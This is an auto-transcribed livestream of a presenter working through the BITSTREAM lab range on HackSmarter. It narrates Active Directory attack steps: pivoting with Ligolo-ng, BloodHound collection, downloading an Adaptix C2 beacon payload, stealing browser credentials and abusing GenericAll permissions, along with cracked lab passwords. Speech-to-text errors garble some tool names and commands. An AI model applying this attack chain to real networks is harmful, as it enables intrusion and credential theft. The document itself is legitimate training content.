Hi everyone. Hello. Hi. I hope everyone is okay. And we are live. Dog Trace, yo! What's up? Hope everything's well. I just want to check if everything's okay. I've done all the posts, so I think I'm basically ready to go. Let's just see, making sure all the things are live. Hi, Manuel. Hello. Nolsik, hi, how are you? Apologies if I sound nasal. For some reason, I don't know, my nose is just like closed now. I don't know. I was fine until like an hour before streaming. But anyway, so apologies for sounding nasal. I think I'm gonna dive right in, if that's okay. I was looking at some things and just trying to get ready for the stream. But oh yeah, Dark Trace, which one? Let me share my screen. Let's get the range booted up. Can I get to learn hacking from you? Yes, you can. We are hacking CTFs, and yeah, we're training our brains to hack, to pen test, to be better at CTFs, all the things. No stone. Oh, nice. Is that a new one, Doc Trace? So one thing I want to do is I've been struggling to get RDP working. I'm not logged in. To get RDP working on this BITSTREAM, and I think there might be something wrong with the lab. So I'm gonna revert by range. The problem, I've got another problem as well. As I was just troubleshooting my machine and upgrading and actually trying to save some disk space, I broke my VM, so I had to restore from an older version. Am I logged in? So I basically I lost like a couple of things that we did download, which is not a problem because we've got notes. So you know, it's safe to say that the machine is fine, but I wanted to revert the range just because it was doing a lot of weird things for us. But obviously that means all our payloads that we've uploaded there is going to be we have to redo them. But it's not an issue because we're probably going to have to recreate them anyway, because I've got a new Adaptix instance, because it seems like the Adaptix that was installed, the BitStream profile was before the BitStream profile was created, so it was still on Darkhaven, which is not really a massive problem, but just so that you know, that's why I just want to get into it, not waste any time today. Welcome everyone, welcome. I see YouTube's coming up nicely. Good stuff. Evolving Fetus, good to see you. Good to see you. Are you doing well? So yeah, there's only a few things left. Gonna have to remove the BitStream VPN, then copy the downloaded one. If you revert the range on HackSmarter, you have to re-download the the VPN file. Start the T-box. So this will be VPN. Did we get a new IP address? Does not look like it. Oh, there we go. It looks very similar to the one we had. Did it actually revert? Well, we still know. We'll see now. Doctor says I may not be as present. You'll be on the background tonight. No problem. I'm trying to make a Defender bypass profile for Adaptix. Nice. Nice, nice. Yeah, not a problem. Oh, I just killed my VPN. No problem at all. So how's everybody else doing? All right? Good. Okay, so let's start with the first things. I'm just gonna quickly we managed to get onto the SQL server using XML command shell. So we got a foothold on the SQL server. Oh, Nalsec, well, nice. Glad you're doing well. And then we were going for the BITSTREAM. Now, what is? I think we're just going to open another tab for this. So because this is an easy range, it's almost like guided mode in HackTheBox. So the flags, the flags guide you sort of like where to go. So firstly, we compromised the web server. We found the SQL password in one of the messages with the IDOR vulnerability. Not going to go through that again. And then we accessed the SQL server via XP, and we were able to XP command shell, which means you could run OS commands on the box as if you were locked into like something like command line or onto the CLI itself. Then we had to find Bob's password, which was, if I remember correctly, we compromised LSAS, and we managed to eventually, after many tries, we managed to extract the hash and actually decrypt that, or brute force that, and get the password. And the password was Pokemon. And the reason why I say why it took so long is all these servers are Windows 2025. And Memcached by default did not play nice with us. We had to use some other way. David Breen says, I just got the Hack5 Pineapple Mark 7. Totally awesome. I'm trying to find Wi-Fi Coconut. Everyone is sold out. Maybe they'll be selling them at DEF CON, perhaps. Maybe that's why they're saving their stock for DEF CON. That's pretty cool. What's a Wi-Fi Coconut? Is it also by Hack5? I've also got the Mark 7. It's totally awesome. Oh, okay. Packet sniffing. It's pretty crazy. Nice. Interesting. I have to dig into that. Thank you for sharing. Again, apologies for everyone. I sound very nasal, but I don't know, my nose is just closed. I don't know, it's allergies or something. Yeah, 14 channels, I can imagine. Yeah, Wi-Fi Coconut. It's Hack5 specializes in Wi-Fi hacking tools. They've got a whole bunch of things. Well, not only Wi-Fi, they do other things as well. As they've got like the Bash Bunny, which is quite interesting. Why is it not showing the picture? The Bash Bunny, which is pretty much like a mini computer running on USB. So yeah, that's very cool. A pressure mine, yes. Hey, Shilarendro, how are you? Yeah, I like the video, thank you. Yeah, if you like on YouTube, it spreads a bit. Speaking of videos, I hopefully will have a standalone video coming out before DEF CON. So hopefully next week. I actually managed to find some time to record one, which is very bad. I think I haven't uploaded a standalone video in like forever. Must have been like a month. And the other bad news is I won't be streaming next week. What's that flash drive got on it? I'm not sure. It runs, I think it runs like a whole, it might be Linux. I can't remember, to be fair. But yeah, it's got, they've got their own little language called, what was it again? I think it was called Ducky OS or something, which also runs on this rubber ducky. But anyway. So David Bree says, I'm a mobile diagnostic network penetration specialist. I can monitor any network using cloud access with permission from anywhere in the world using the HackSmarter Mach 7. Nice. Yeah, the Mach 7 is so slick, and I think with all the recent, well, not recent, all the updates and improvements they made to that software that runs on there, it's amazing. So the hardware is cool, the software is cool. I'm a big fan. Okay, so back to just back to this. So we got Bob's password, which was Pokemon. We managed to compromise Workstation. Did we compromise Workstation? No, we didn't. We tried to log on to Workstation with Eddie's username, but it didn't want to work for us. It had two ports open, which was remote desktop and WinRAM, and neither of them worked. So I've reverted the range, and I want to see if I can log in there now, because the problem that we have is we are landing in this subnet, subnet ext, and this range does not have direct access to subnet 3, which is where the domain controller is. So if we want to compromise the domain controller, we have to hop through one of these 3 boxes. And the next task was getting Louisa's password. Now, to get, we were looking for Kerberoastable users. So we wanted to do a Bloodhound ingestion, but we couldn't get Bloodhound to work. It didn't want to run from any of the boxes. Or it didn't want to run from the SQL, hopping through SQL. And then we played with Ligolo a little bit, Ligolo NG. We got that working at the end. It's pretty sweet. I haven't used it in like forever, but I reminded myself how it works on last week's stream, and it's pretty slick, very cool. What it is, Ligolo is basically a VPN client and VPN server So it connects a VPN tunnel that enables you to route your traffic through the tunnel and then pop out on the other side, like as if you were locally on that network. So with you don't have to jump through a proxy. You don't have to use proxy chains. You just tunnel your traffic through the software VPN, and then you can get there. David Breed, the easy way to stop hackers is close all the ports. Yeah, it's like how do you make a system unhackable? You have to turn it off. The old cliche, right? Let's see. Okay. So I wanted to test remote desktop. We weren't having much luck with that. Like I said, I had to revert the range. So let's just see. So we got Cobra. So we managed to grab Eddie's password, which was Superman. And then where did we? Okay, let's try that, right? Let's do. So we tried. Should we try Evil WinRM first? Hi, workstation, BITSTREAM. Stream.hsm minus u, which is Eddie. Password is Superman. Let's see what this does. Hey XR, welcome. Again, thank you very much for your support. I really appreciate it. And I'm working on that all blackout limited range that we talked about. Let's see. Okay, so it came back with a prompt. With Evil WinRM is not always to say that it's working. Yeah, it doesn't look like it's working. That's the problem with Evil WinRM. It sometimes looks like it's working, but it doesn't work. No. Okay, let's try. Yes. Let's try XR. What's the command name in blank? XDR. No. I know it's Revelar. What's the other one? XRDP? RDP. Test. Can't believe I forgot the name of that thing. X-free RDP. Exa says, gotta rep the shell. Yes, that's right. X-free RDP gets 3. It's got a weird syntax. It uses like /v and then workstation.bitstream HSM U, which is 80 /p Superman. Let's try that. Help. But you could do like a cert ignore. But maybe if I use the right name, there we go. Oh wow. Okay, so It's working. I forgot to. So a little tip: if you want to be able to maximize the screen, you gotta use dynamic resolution, and then you'll be able to maximize the screen. Okay, great. We finally got access. So there was a problem with my instance of the range, obviously. But yeah, so you learn. It's very slow though. Bye-bye. I can't spell, obviously. Let's try this. Who have I? I'm Eddie. Okay, cool. So there's two things we could do. We could try and pivot through this machine again and run something like Rusthound, or even the Bloodhound ingester from netexec, or we can run Sharphound straight on this box. I don't think antivirus is running. I think somewhere it says that. So that we could try and find Louisa's password. I'm assuming Louisa might be logged into this machine, into workstation. But let's see if we can get that done. Wonder what will be the... Should we get Adaptix C2 up and pivot through that, or should we try Ligalo, get Ligalo on, or should we try and run Sharphound straight from that workstation? What do you guys think? It's about 3 options. All 3 should work, but we're just trying to get Bloodhound or Sharphound to run. What do you guys think? Ligalo. I hope. I don't know if you were here in Allsec, but I'm gonna have to reinstall it again. My VM crashed, so I did mess with it, and it's actually, once I got my once I stopped confusing myself, it's pretty straightforward. But I crashed my VM, so but it's not an issue. Maybe I can show you guys how easy it actually is. So or how straightforward it's actually supposed to be. Let's do Ligalo. I think Ligalo is, it's a good way to know. It's actually a very nice way. Just need to get it downloaded and try and not confuse myself again. So Ligalo. Ligalo G. So the proxy runs on the attacker machine, and then the agent runs on the victim machine. And you can do it the other way around. The only problem is with the proxy, you're probably going to have to listen to some port that you do need. You do need like admin on. So if you don't have admin, you don't have the luxury of listening onto to like all the ports. So it's a bit limited. It could work, but it's I guess it's just easier doing it this way around. So let's do Legalo. So I think this is where I confused myself last time, because you got proxy, so you got agents. Now we are running, we need a Windows agent, but we need a Linux proxy. Let's see. So the agents, Windows AMD. So the Windows agent, and then the Linux proxy. And I've got ARM. Okay. Let's see. Come on. Bigelow. Do I actually? I didn't even check. CTF. Tools. No, I don't have it. So, Bigelow. Okay, so that's the that's the Linux agent. That will be unzip. Oh. Okay. So the agent we need to get onto the Windows machine. The easiest is, and the most, I guess the most straightforward is just to stand up a Windows server, or sorry, a web server. And for that we use Python 3 p.server. We can say port 80. Otherwise it listens on port 8000, which is also fine. Does it make sense? Any questions so far? Have I lost anyone? Did I lose? Rewrite desktop. Okay, let's try. What is it? Oh, I have it. Okay. Install. Remember, is just like another remote desktop client for Linux. So it was workstation.bitstream. I lost connection. Oh, looks good. It's just slow. Come on. Workstation bitstream. This IP address. I think it was 1.1.6. 0.1.6. Okay, let's go for, let's see if we can connect to the SQL server. Because we've got admin access on the SQL server via evil1rm. Just grab that command. SQL. I think it was via hash. Oh, I probably need to grab the hash again. So I wonder, yeah, because it's been reverted. We can just see if we've got connectivity. Let's see first. Why? What is going on? Okay, it's weird. That was supposed to work. Webinar is not working. Did I do? Running. I feel like I wonder if this did reset. Let's just, I'm just gonna reset it again, just to be sure. Sorry guys. Taking a bit longer. Any questions while we wait? Old school playhouse. I've spoken to him a couple of times. I don't know him. I know him, sort of. Not I guess not personally, but I do know him, yes. So hopefully I'll meet him. Yes, I've got tickets already. Yeah, I'm gonna be there. You going Allsec? Okay, it looks like it's booted. Let's try. Let's download the VPN again. Yeah, I've got tickets to go to his event. It's on Friday. Yeah, it's for a good cause, right? For charity. Yes. Yeah, it's yeah, I'm meeting a couple of friends there, and then the plan is to meet the man himself, and I guess there's some other people that I also like to meet there, but yeah, it's got to be fun. I wasn't gonna go, but then I was lucky enough to get so I'm going through the company, but like I said, I wasn't. I just think like maybe 2 weeks ago, I only heard I was going. I thought I was gonna be stuck at home. Yeah, it is the best way. You're right. There was a time where I used to go every year. I think I went for like 6 years in a row, and then I haven't been to DEF CON in like 8 years. So 8 years ago, I used to go every year, but I haven't been for a while. So I'm pretty excited to go. Okay. I know sometimes this range takes a while to boot up. But we should be able to access the website, which was http web.bitstream. Yes, that's up. So the range is definitely up. What is wrong with... Ah, that works. Okay. So fresh reverted range. Let's see if Remina plays. BitStream. HSM. Yes, I'll accept your password, your certificate. Eddie Superman. Awesome. Okay, so that's working. So now we can download our agent. Just wait for it to boot up. So what's nice about Rebeta, you don't have to do the / dynamic resolution. You can just press this button. But it seems like the Windows is still booting up. Maybe I'm just too impatient. Okay, let's just give that a second. So I'm hosting, so agent.exe is what we want. It should work. Is it this one? No. Okay, it doesn't want to go big for us. Oh, okay, that works. Just had to refresh. Okay, so what was my IP address? Uh, 192.168.2.1.1.2. So that is workstation. No. 192.168. This is the attacker machine. 116.2. That's right. 2.1.1.2. Two 2.1.1.2. There we go. Okay, so agent is the one we want. So let's save it into documents. Keep it. No. Wrong button. Agent. Documents. Keep. Report this app as safe. No, don't want to do that either. What? I should just do it via the command line. Documents, okay. This doesn't work, then I'll do it via the command line. Save link as save. Keep. Don't want to delete it. Then more. Stupid edge. Let's do it via the command line. PowerShell. Okay, let's go documents. wget http 2.168.2.1.1.2 agent.exe agent.exe minus R. Okay, it looks like it's coming. Okay, so that's working. So what we do now, we start up the server. Okay, we don't need that anymore. So proxy, I think it was self cert. Let's start with we don't do that. So I think the step I forgot to do, so if you look at your interfaces, if you do ifconfig on Kali, I've got the tunnel interface, I've got the loopback interface, I've got the Ethernet interface, Docker, and some. This has got to do with my virtual, but I need to create a interface for Ligalo. How you do that is you go create BITSTREAM, just call it BITSTREAM. Pressure. I need to be sudo. Yes, I did figure it out, but I just reread the. So there we go. You just create. I think I missed. I only realized that after I tried to set everything else up. But go back to that screen. I think it created, yeah. So now I've got a BITSTREAM interface. You guys see that? So that's why it works so seamlessly, and you can just route anything. And then all you do, so you I think you should root, add, name, root, add name, stream. Then you just add a root. I'm just gonna add both the roots so that it, well, actually you only need to add one root, so that's to get to the main controller. I think that's where, because we want to query the main controller with Bloodhound, and that is 10.0.2/24 10.0.2 0/24, like so. And so there you could go like show root list. Okay, there's the root that we added. Hive list. There's the interface we added. And then I think then we should be able to connect back. So this is forming the tunnel, and our routing is in place now. So we need the agent to connect to the proxy, and then we can start the tunnel. I'll show you guys now. So for this one, agent, I think it's just like that. Oh, I need to connect 192.168.211.2. What was it listening on? 11601. 11601. 11601. Okay. Okay, so it connected back. It's got a certificate error, which let me just fix that. I forgot about that. So you go ignore sort. Okay. Okay, agent joined. Looks a lot better. Agent joined. So all we need to do now is start the, well, actually, let's see, session. So we pick the session that is active. You can have more than one sessions, but this is coming from the Eddie workstation. Eddie at workstation, apologies. So there we are in the session, and then we have to just, it's tunnel list. So it's online. So here's where we bind it to the tunnel start. And the name of the interface was BITSTREAM. Okay, tunnel list. There we go. Okay, so it's bound to it now. So now we should be able to get to the domain controller. A very quick way to do that is just to see if port 88 is open. That's for Kerberos thing. So if we go nmap, it's bn DC01 workstation, no, BITSTREAM, HSM, it's B88 minus VV. Okay. So we can get to the domain controller. So does that make sense? I think there was a nice diagram. Yeah. If that doesn't make sense. Yeah, it is weird. You would think null success is surprised that I'm assuming you're talking about the interface. There is an auto configure, but I don't think it worked. It didn't want to work last time. Where was it? Documentation. Where was it? Here we go. So they talked about the interface, Ligalo interface. I call this one BITSTREAM, but it's just to get from the attacker network to the agent to get to the server, which is our domain controller in this case. So maybe this will be easier. So we currently land in this network here. We connect via Ligalo to workstation, which has got access to the main controller. So we just route all the traffic that's destined to 10.0.2.0 to go via that interface. And that's why it's pretty seamless. You don't have to use proxy chains or nothing like that. So I like to use Rust Hound. Excuse me. So Rust Hound. How do you run it again? So I think it is as easy as just minus D. Minus D. BITSTREAM. HaxSmarter. Username. Yeah, that'll work. So we did the main user. Any domain user will work, even a low level one. So we got to use Eddie. The password Superman. And it failed to authenticate. Server requires bind. So it probably doesn't know. Let's see if we just give it the IP address. This. We can give -I is 10.0.2.2.5. 10.0.2.5 still doesn't work. Rip. Just look at this. More. So there's the user, the password, the FQDN. We could try the FQDN. What was it? -F. -F. DCR1 BITSTREAM.HSM. Sudo vi etc hosts. etc, I can't type. Docker BITSTREAM. Let's put this first. Okay, so Rustdown's not playing. There's another way to do this. I think it's bloody AD can work. It's just got some weird syntax that I can never remember. Advanced. Bloody AD. It's not case sensitive, surely. Bloody AD. I think it's installed. Okay, bloody AD. Okay, there's the syntax. Not that bad. Auto bloody has moved. Okay, that's all good and well. Just clone this. Bloody ID. Mike. Make it stall? Or was that just figure? doesn't work. Should be installed. Let's see, bloody ID. Good. Why is that all working? Don't want to break the distribution, so still not. What? Is it here? Fun, fun, fun. It's got a wiki. Installation page. Pip install. Oh well. Let's do it. It needs, I can't believe it's such a mission. Sorry, the wrong UV. Maybe this is UV needs to be updated. Give it to install. What does it want? Okay, that doesn't work. Why? That's what I did. Add. I broke it. Pupix. Pupix. Pupix better? CTF. HaxSmarter. BITSTREAM. Bloody AD. Ta-da! Okay. That took forever. Actually, I had Bloody AD pre-installed just to be ready for the stream. But then my VM crashed. Around. Yeah, luckily I had a backup, but it wasn't the latest backup. So I'm okay, but I'm like 3 weeks, maybe 4 weeks, maybe a month old. So it wasn't in the worst spot, but could have been better. But it literally happened like 2 hours before I had to stream. It's something like get bloodhound or do bloodhound. Is it there? Sharphound. We'll try that next if this doesn't work. or not. What am I looking at? Oh, I guess we could look at here. This is a cheat sheet. Collect bloodhound data. Ah, there we go. So this is what I was looking for. Let's take for our notes. So currently we are, let's do it under workstation. So we've got Legalo working. So it will be bloody ID host .0.2.5 the BITSTREAM HSM. Username will be Eddie. Password will be Superman. Get Bloodhound. Let's see. Okay, it looks like it's working. Beautiful. Beautiful. Okay, so that was worth it. Maybe. Okay, let's start up Bloodhound. Tools. Bloodhound. Let's just remember how to do this. Sudo docker compose. Look at it. Maybe. Okay. Not that. Support again. Oh, I didn't try Blood on Python because the reason I didn't try that was because it's Windows 2025. So I didn't even try that one. But hi, welcome. I used Bloody ID, which worked. Sharphand will also work, which we can run from the Windows machine. Quick start. Oh, thank you for the like. Appreciate that. Why? What does it? I think maybe I started it wrong. There's like 2 ways to start around. Where is it now? Was that closed? Status. I think it's containers. Start. Okay. There we go. Okay, now. Oh, password expired. Haven't used it in a while. Look. I used the same password. Okay. So if you look at the download collectors, we get the shellpound zip we can download here, which we can download and just run that just to see if we can. Out of interest, it's always good to have more than one option. Administrator, data collections, file ingest. Probably just need to just make sure the database is clear. Just gonna delete all this. Okay, there was an error. Okay, maybe it's clear already. File ingest, upload, view. Okay, we go HaxrByte, CTF, HaxSmarter, BITSTREAM. Okay. Upload. Okay, let's see if we can run ShopHound. We could go back to BITSTREAM. So I go Python 3 minus m http dot server 80 move downloads ShopHound unzip ShopHound. So let's Python. Maybe that doesn't work anymore. This remote desktop is flaky. How do we do this? So let's run. Let's run. Shell. Okay, that's wrong. Oh, why is my connection so it's a tunnel down? Okay, it says online. This workstation is not happy. I think my line looks fine. Oh, we could do that later. Let's see what this is being completed. So explore. So BITSTREAM. So here's the domain. So what's the user we wanted? Well, first let's, I don't think we had the opportunity to actually look at Cobra-roastable users through Bloodhound, so that's cool. We can check that out now. We did it with netexec, which is also fine, but what's nice about Bloodhound, you can run these queries. So CVC account and Eddie. Oh, that's Dark Haven. Sorry, it must not have cleared the database. But there's BITSTREAM, there's Eddie. So that was our answer for the other question. So let's look at the other user, which was Louisa or Louisa. Okay, Louise. Anything interesting? So it is enabled. That's always good to check. Just a pro tip, just always check if the account is actually enabled. It's a member of the main users, and outbound object control, that's what that's interesting for us. So there's generic all over James. So that means Louisa can do anything to James. Let's take a screenshot of this. Basically full control over James. I'm assuming James might be our next interesting user. Why is flame shot not working? Flame shot. Take a screenshot. Nope. Flame shot does not want to. Quit. Wow. Let's try it again. Flame shot. I've never had this issue with flame shot. Anyways, let's see if we can try to remember that. So Louise. Look it out here. Lisa. Generic. All. Flame shot still going. Over James. Okay, let's so that is interesting. And James is enabled, and James is a member of. James is looks like a typical user. Doesn't really have much, but okay, I guess we'll just keep that in mind. So what is the password for Louisa? We need to log into Workstation, but Workstation keeps on breaking. Oh. Okay, GHOSTSHELL. That's not gonna help. Station. Let's try HaxrByte. Nope. What if we just revert that box just by itself? Guess we could go after the other boxes, but we're sort of following the system. So yeah, just that one. We're following the flag, so we sort of have to do that one next. At least we've got Bloodhound working. Any questions so far? Some water. It's while we wait for workstation to get up. Let's see if we can get SQL wants to play with us. SQL also. Just gonna restart that one too. We go. So the other problem, Ligolo is not working because we need the agent again on workstation. It sounds familiar, but we've got Bloodhound data now, so we don't need that now. But it's a good question. I wonder if it's not Rusthound. Could be Rusthound. Rusthound's pretty cool when it works, obviously. Should we rather try and put a beacon on it than I was just curious if you knew it. It meant more for red teams. Okay. Yeah, I mean Bloodhound, I don't know. There's a couple of things to do. Bloodhound is probably not something you'll run on a red team because it's so noisy, even if you try and be quiet. So Bloodhound is probably not something I would run that often. Not saying you can't, but yeah, I'll dig into that. I think I know what you're talking about. I just need to go and check, go and research it a bit. So what do we do now? Okay, let's start up our C2 server. Yeah, I think I know what you're talking about. I just can't remember the exact name now. Start up adaptix. So it's sudo adaptix server. It's distribution. Profile. And then we start the client. So we'll do new profile, HaxrByte. BITSTREAM. Okay. I don't know why it pulled all these. Okay, start the listener. Is that right? Yes, that's right. And then we need to just create a payload. Create. No. Just remember where to do this. Thought it was generate agent. So it will be listener, it will be HTTP, beacon, profile, change the name, generate. Here we go. CTF, BITSTREAM, not there. Let's call it payload. Save, build. I did build it already. Good stuff. Okay, let's see. Okay, so now we need to quickly revert desktop in, upload that, and then hopefully we can have a beacon which is a bit more stable than the remote desktop. Let's go ahead and go back to our session. HaxSmarter stream. So we've got payload. Python. Probably got a server running already. So let's try Remina. State.0.1.6. Come on. Still taking too long. Okay, let's try trade DP P 6 user 80. Run. Not for nope. Is the agent still up? No, it can't be. Session. Yeah, that's so. I really don't want to revert this range again. the SQL server was pretty stable. Can't believe I'm doing this. Let's see. 90 minutes left. I don't know. Should we try resetting it? Hey Pebble. Nice to have you. The VPN is still up. Just frustrating with this. These boxes. What is concerning me, I've reverted the range, but the IP stays the same. Which is probably fine. CTFs, hey, HaxSmarter box. Which one is it? It's the BITSTREAM range. Yeah. Yeah, people, this SQL worked, right? Not that. That's just how I tested. This one definitely worked. But I don't know. This remote desktop service is what's not working. Yeah, Nullsec's been here before you, CTFs. I don't want to cause trouble or anything, but yeah, that's true. We can ignore the cert, but I don't think that will. Or the tunnel is not. Oh yeah, the VPN tunnel is up. So I can. We can quickly check that with. Just seeing if the tunnel is up. Yeah, I can get to there. The pivot tunnel is not up now because the workstation box's remote desktop was very flaky, so I reverted that one. No, it's not a problem. Not a problem at all. I mean, you're always trying to help, so I appreciate that. And I always seem to have the weirdest problems on stream. It's my curse. I do say I want to show the struggle, but this is insane. The demo gods is not your friend. Definitely not. Yeah, tunnel is up. Definitely, I can get to workstation. I had a similar issue last week, but then I reverted the whole network, and then remote desktop worked. But I don't feel like doing that. I guess. I might as well. Did I revert it already? I did. Let's do this. Okay. Starting up. Let's stop this. So you have to download a new VPN file. It's not a big issue, just takes a while to start up. Okay, it's not up yet. Let's give it a couple of seconds. Yeah, Murphy is, yeah, it's always messing with everyone. Anyways, any questions while we wait? We could do a little AMA session. Ask me what you want while we wait for this thing to boot up. At least we managed to get Bloodhound this time. So I think the plan is Adaptix is up. We've got a payload generated. We'll remote desktop in, deploy the payload, and then get a beacon back with Adaptix. I have not, no. I haven't done holiday events. I was so busy at work, I didn't really have time to play. I just used the stream to play. I haven't had any fun. Had time for any fun. This is my fun, what I'm doing now. Okay, that's up. See, it's got the same IP address. Okay, let's see. At least I'm going to summer camp to DEF CON, so that's something. So that's why I want to try and finish things up so that I can be in a good place to not worry about work. So if I do this now, okay. Yeah, I have unfortunately not. Okay, so let's do this quickly. Remina. See, it works for a couple of minutes. Then it stops working. Okay, let's do this. Let's hope that boots up. It should boot up. Let's get our payload ready. So that's the payload. Do I have a web server running? Yes. Okay, I've got a web server running. Payload. Payload. So this is Adaptix. It gave me some weird. Come on. Okay, I'm just gonna do it while we wait for this thing. So sorry for the small screen. But I'd rather do it while we have access. Thank you for the like, appreciate that. Okay, so wget b 192.168.211.2 payload dot 64.exe can't spell payload. .exe. Maybe we should get the Ligolo agent while we're here. Oh, that's wrong. Spelled it wrong. Can we do this now? Still not. What's it? Rename. Come on. It's very slow. Maybe it stopped working already. Damn it. Try to refresh, worked last time. Oh, flashbang. Payload should have a beacon. Okay, got a beacon. Who am I? Okay, we are Eddie. So that's good. Let's try and see. Legend. Connect. Two 1.1.2. 1.2. Controlling the port. So I'm trying to get the Ligolo while we are here. 11601. 11601. And I think it's, does it ignore cert. Too many dashes. I think it's just one dash. Okay. Session. Total list. Session. Okay, that works. Total. start done bitstream. Okay, so bitstream is working. We can test the tunnel by just seeing if we can connect to the domain controller, because there we know we hop through. Quickest way to do that would be to see if Kerberos is open. Okay, so we can connect to the domain controller through the workstation machine. Okay, but we want to run, this is why I wanted a beacon with Adaptix. I think we were looking for Louise's password. Just see how all this works. Louise has got a Louisa as a username or a folder. Oh, this thing is, I wonder if this is the problem. So hard drive is a bit full. Okay, Eddie. Let's see, what options do we have with what boss? Should we do buff? No. Execute buff. Try this thing. Okay, these are up. Should be okay. Shell. Oh, okay. No. It was working. I think I was just scrolling the wrong way. Okay, let's see what options we have. Okay, we can look at the processes. PS list. So 80. Okay. Well, probably because this is not a, it doesn't have admin rights, so it's not going to be able to see other users' processes, so probably won't be able to laterally move there. Let's see what else. So smart scan, task count. privilege. List op table. Group, post exploitation, lateral movement, execute assembly. So we could use that to execute. So for example, if you have sharpbound, you don't need to upload it to the box. You can use execute assembly, and that can run .NET assemblies in memory. You don't have to touch disk. It's quite nice from a red team point of view. LSA dump, host creds. Probably need cookies. So I don't think SAM hashes will, I don't think we'll be able to run any of these because we need system. Group, that's for AD. Kerberos, SETI. One thing that I did want to try, it's Cookie Monster, Edge, Chrome, Firefox. I did see Chrome there. You can get the Intel ME hash for the current user. I don't think it's not going to help us much, but it's interesting. If I could spell. So you just run it. Okay, cool. That's our Intel M host. Got the posit for Eddie, which is Superman, so that's not going to help us much. Let's see how we look on time. We can restart this again. Probably won't stream for that long, but just like a counter that counts down. Thank you. I just restarted it. I must probably change it a bit. Let's do... What's the time now? Let's stop that. Let's stop that. Let's do... Sorry, let's do this. Don't do that. Just change the time. Okay. Let's do it for another hour. I would really like to get a bit further with like the next flag at least. What was it? Cookie Monster. Okay, then copy cookie file. I'm down, yeah. Minus B. Got H right. So Cookie Monster. Minus B. H. MSH. example, usage, browser. Can we just run it like this? Decrypted. Okay, doesn't look too happy. I don't think I saw Chrome on there. We still have remote desktop. Oh, we do. Let's see if there's any. Passwords. GitLab. Oh, what do we have here? Is that it? I need to take a screenshot somehow. Can I do this? Hey, took a screenshot. Pictures. Oh, that's pretty cool. You can take screenshots with Remina. I didn't know that. Okay, now we need to. Let's test on now. Pictures. Okay, here we go. Can you draw on this? Oh. B. Paste. Yes. Who needs flame shot? Oh, that's a bit small. Okay, let's copy that. Copy. So it's Louisa. Go. Okay. BITSTREAM. Just a Lulu design. Copy. I think that's our next flag. What is Louisa's password? Paste. Submit. Yes. Okay. Let's see what's next. What permission does Louisa have over James? I think we got this answer already. Louisa has over James generic. Why? Generic all. Go on. Louisa. Okay. Wonder if flame shot will work now. Flame shots. Still not. Anyway, generic all. What's nice about generic all, got bloodhound. We can take this down in the meantime. So we can force change the password, but obviously that's not a good idea in a live environment. So the next one is the shadow credential using PyWhisker. This is quite cool. Make a copy of that if I can. It's the wrong key. Doesn't want it. Okay. Anyway, lots of fun with this machine today. Let's see. So we got generic all, and I believe that's our next key. Generic all. What did I do wrong? No underscore. Generic all. Yes. What is the password for SVC backup? Let's look at Bloodhound. SVC backup. So SVC backup is enabled. Always good to check. SVC backup is a member of remote management users, so potentially evil 1RM and outbound. Okay, you can get changes for the domain. Okay, changes all. So you can do a secrets dump on the domain controller. So we can effectively steal the admin hash if we manage to get the password for SVC backup. So how are we going to do that? I'm assuming maybe if we log on to workstation, with Louisa's password, I think. Let's try that. I wonder what ports was open for Louisa. Can't remember. So share.bitstream.hsm. See if we can access that. NXC SMB share.bitstream HSM Louisa. Password was Lulu something. Copy there. It's I don't know what that is. Oh, need to escape the exclamations. Didn't like that at all. NXE broken? No. It has to be like so. Apt reinstall netexec. Evil with RAM. I share stream them. Louisa. See if that works. Feels like it's taking a bit long. We might not be able to connect directly there. We might have to hop through Ligolo. No. Let's do DC-01. Still doesn't like that. Not happy. I think I broke Python with bloody AD. Potentially. Is it Louisa? So James. See what we can. So nmap. Share. So 3389 is open. So remote desktop again. 445 is open. I guess we can get the new netexec to see if that also doesn't work. I think this one is newer than the one that you get with app install. Save tools. Let exec. So it should be UV install. It's like pipx, but it's built in Rust. It's supposed to be better and quicker, but I sometimes use pipx, I sometimes use UV. Yeah, it's what's nice about UV. It's got the virtual environment as well as the running with the same as pipx, but yeah, it's got both. It's sort of tried to satisfy from a developer as well as virtual environment. So UV install. So it's this one. Sorry. Not working. There we go. Flashbang. So should have done this, I guess. Tool install. Oh, that's why that went wrong. So it's tool install and then run. This will be minus, well, share BITSTREAM. So, the reason why I want to install this version, it's got all the latest stuff. So if you go, I don't want it to do that every time. Do I have to do that every time? No. Yes, okay. So I don't have to, I could do this. This will be L. So you know there's that new vulnerability for all the DCS stuff. Um, it's 30 something. 30 ghost exploit. So 30 ghost exploit, they've actually, there's a module for this already, but you can only get it with the latest one. Like that. It's build up. Oh, it's sorry, it's called CVE. So enum CVE, you can pick, you can run enum CVE and it will tell you if it's vulnerable for this already. It's been added to enum CVE. This is very new, like 24 July. It's like 6 days ago. So they were very quick with us. So I'm just trying a different version. Just thought I'll tell you why. HSM. User is Louisa. SP. Okay, that works. Okay, and that's fine. Okay, what is share? Okay, that is share. So effectively, DC-01 should also work because it's going through the Ligalo tunnel. Copy this for our notes. Okay, so we can get to share, get to remote desktop. So let's try remote desktop, I guess. Not remote desktop, terminal. Share. Yes. Louisa. Password. Lulu design. Okay, that looks cool. Cannot connect. Okay, maybe she doesn't have close. Okay. Let's see if there's I guess shares will be good to try. Shares. Because it says share. Let's log on. Nothing crazy or interesting. Read the default. The password was CVC backup. CVC backup. Cesar Wasta says more tools is more good. Yeah, that's right. More tools is more good. Remember we had I think generic all over James. I forgot about that actually. So we can reset James's password with bloody AD. We've got bloody AD installed. Typically the live environment we probably don't do that, but this is a lab, so, and we really want the password for SVC backup. I'm not sure why. Maybe if we try as James, we might get further. So let's just get yeah, it's especially without permission, but this is CTF, so we don't need to worry about that. Set pass. Okay, so this is, we can change the password with this command. Change some things up, so it will be we're gonna have to be able to access the domain controller. So I would say dcr1.bitstream.hsm. That's not the local host. We don't need that. Domain, do we need domain? Bitstream. HSM. The user name will be Louisa. Password will be Lulu Design. I don't want to hide it. If you guys are wondering what this is the GHOSTSHELL command vault, and this is basically a cheat sheet on, I guess, steroids. It automatically swaps out the parameters that you give it here. You swap it out in the command, and then you can just change it and then copy it. If you guys are interested, I'll paste the link here if you want. Access is totally free. It will ask you for a username and well, not a password. It will ask you for a hint. The hint is HaxrByte, so but it's in the page if you guys want. It's pretty cool. I'm not going to talk about it too much now, but it's got these sets. So it's got pen test, red team, basic, and advanced. I split them out like that. CTF is the one I'm building on stream. These are all the commands that I've used on stream. So I sort of wanted to make sure those are new, but the others are like from cheat sheets that I just ingested in here. So anyway, you guys are welcome to try it out. 